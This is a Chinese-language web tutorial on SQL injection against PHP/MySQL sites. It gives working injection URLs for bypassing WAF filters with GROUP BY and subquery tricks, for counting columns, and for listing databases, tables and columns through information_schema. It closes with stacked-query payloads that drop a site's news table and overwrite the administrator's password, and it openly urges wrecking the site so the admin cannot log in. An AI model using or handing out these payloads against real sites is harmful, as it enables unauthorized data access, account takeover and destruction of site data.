萬盛學電腦網

 萬盛學電腦網 >> 數據庫 >> mysql教程 >> SQL注入中基礎的幾個問題及解決方法

SQL注入中基礎的幾個問題及解決方法

  以 php 為例

  引發 SQL 注入失敗最主要的原因是什麼主要就是 WAF 和手工保護代碼,WAF 用於攔截惡意代碼,但是 WAF 很好繞過,規則是死的,人是活的。WAF 部署在服務器端,根據預先定義的規則對 http 請求進行過濾,繼而攔截一些通用的必然 xss 和 sql 攻擊。

  Order by 語句被攔截?

  這個情況很少發生,,但是有時候 WAF 由於某些原因會攔截,不過,我們可以繞過,方法很簡單,用 Group by 就可以了。因為不再 WAF 的規則列表裡

  比如下面這樣提示 403 forbidden

  http://www.8090sec.com/gallery?id=1 order by 100--可以嘗試一下 group by

  http://www.8090sec.com/gallery?id=1 group by 100-- 成功

  但是,有可能這個還會被攔截。所以我們使用一條流傳不那麼廣泛的一個語句。那就是

  (主查詢語句)=(select 1)

  http://www.8090sec.com/news.php?id=8 and (select * from admins)=(select 1)

  可能會返回一個錯誤,類似 Operand should contain 5 column(s).

  這樣我們就知道有 5 列了。

  然後 union select 就懂了。。

  http://www.8090sec.com/news.php?id=-8 union select 1,2,3,4,5--order by 10000 了仍然沒有報錯?

  這裡講一下有時候 order by 可以用,但是到 10000 了還是不報錯,與上一節不同的是,上

  一節是請求被 WAF 攔截,這裡呢,則是因為注入語句有點不同,當我第一次遇到的時候,

  我天真的以為數據庫表裡真的有 10000 列。答案很簡單,order by 1000000 還是不報錯,是

  因為我們的注入語句沒有運行。

  http://www.8090sec.com/news.php?id=9 order by 10000000000-- 不報錯

  我們稍微改變一下 url ,在 id 後面加一個單引號,並且在最後加一個加號。

  http://www.8090sec.com/news.php?id=9' order by 10000000--+ 報錯

  然後開始使用 union 查詢就行了,方法一樣。

  http://www.8090sec.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+

  從其他數據庫裡獲取數據

  有時候我們注入成功了,但是讀出來的表都是些新聞啊,相冊啊,文章啊,之類的,我們要

  找的可是管理,登錄表啊。這時候我們就需要看一下是不是還有其他的數據庫。

  首先獲取所有的數據庫名:

  http://www.8090sec.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

  然後獲得指定數據庫的表:

  http://www.8090sec.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema= (這裡填寫數據庫 hex 編碼)

  然後獲取所有列:

  http://www.8090sec.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables

  where table_schema=(這裡填寫數據庫 hex 編碼) and table_name=(這裡填寫表名的 hex 編碼)

  通過 SQL 注入可以修改數據庫裡的信息嗎?

  SQL 可以查詢,更新,插入信息,所以,查詢信息只是其中的一個功能,有時候無法破解

  管理員帳號的 MD5 值。那麼為什麼不自己加一個呢..insert 插入語句就可以,如果找不到

  後台,邪惡一點,干脆直接 drop 掉整個表,這樣,管理員也登陸不上了。網站也壞了。還

  可以通過 update 更新語句來修改管理員密碼,

  http://www.8090sec.com/news.php?id=1

  假設這裡存在注入。

  我們通過 union 獲取了一些表名,比如有個 news,那麼我們通過下面這個語句刪除 news

  表。

  http://www.8090sec.com/news.php?id=1; DROP TABLE news

  然後網站所有的新聞內容就沒了,如果要該更改管理員密碼,那麼這樣:

  http://www.8090sec.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = '你自己的 md5' WHERE login_name='admin'--

copyright © 萬盛學電腦網 all rights reserved